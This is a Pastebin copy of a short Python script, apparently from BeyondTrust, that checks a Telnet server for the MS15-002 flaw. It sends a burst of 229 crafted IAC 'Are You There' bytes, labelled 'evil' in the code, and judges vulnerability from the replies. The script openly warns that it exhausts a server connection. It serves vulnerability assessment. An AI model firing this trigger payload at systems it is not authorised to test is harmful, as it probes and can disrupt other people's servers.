Guest User

MS15-002 Checker

a guest
Jan 16th, 2015
2,119
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # BeyondTrust Research MS15-002 Checker
  2. # Note this checker is not safe in that it will exhaust 1 connection as defined in
  3. # Software\\Microsoft\\TelnetServer\\1.0\\MaxConnections
  4.  
  5. import binascii
  6. import socket
  7. import random
  8. import time
  9. import sys
  10. import os
  11.  
  12. NUM_COMMANDS = 229
  13. COMMAND = "f6"
  14. PORT = 23
  15. HOST = ""
  16.  
  17. def printBanner():
  18.     print "----"
  19.     print "BeyondTrust MS15-002 Checker"
  20.     print "----"
  21.    
  22. def usage():
  23.     print os.path.basename(sys.argv[0]) + " <target>"
  24.  
  25. def getPayload():
  26.     evil = ""
  27.     for i in xrange(0,NUM_COMMANDS):
  28.         evil += "ff" + COMMAND
  29.     return evil
  30.  
  31. def main():
  32.     printBanner()
  33.     if len(sys.argv) < 2:
  34.         usage()
  35.         exit(1)
  36.     HOST = sys.argv[1]
  37.     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  38.     s.settimeout(5.0)
  39.     try:
  40.         s.connect((HOST, PORT))
  41.     except:
  42.         print "[E] Could not establish connection"
  43.         s.close()
  44.         exit(1)
  45.        
  46.     s.send(binascii.unhexlify(getPayload()))
  47.  
  48.     try:
  49.         sessionSetupResponse = s.recv(256)
  50.     except:
  51.         # no response to initial packet, bail
  52.         print "[E] Unable to contact telnet server"
  53.         s.close()
  54.         exit(1)
  55.     ayt_resp = ""
  56.     try:
  57.         ayt_resp = s.recv(2048)
  58.     except:
  59.         print "[*] VULNERABLE"
  60.         s.close()
  61.         exit(1)
  62.     if ayt_resp.lower().count("yes") == 227: #this will also avoid inetutils (will return 229 yes)
  63.         print "[*] Patched"
  64.     s.close()
  65.  
  66. if __name__ == "__main__":
  67.     main()
RAW Paste Data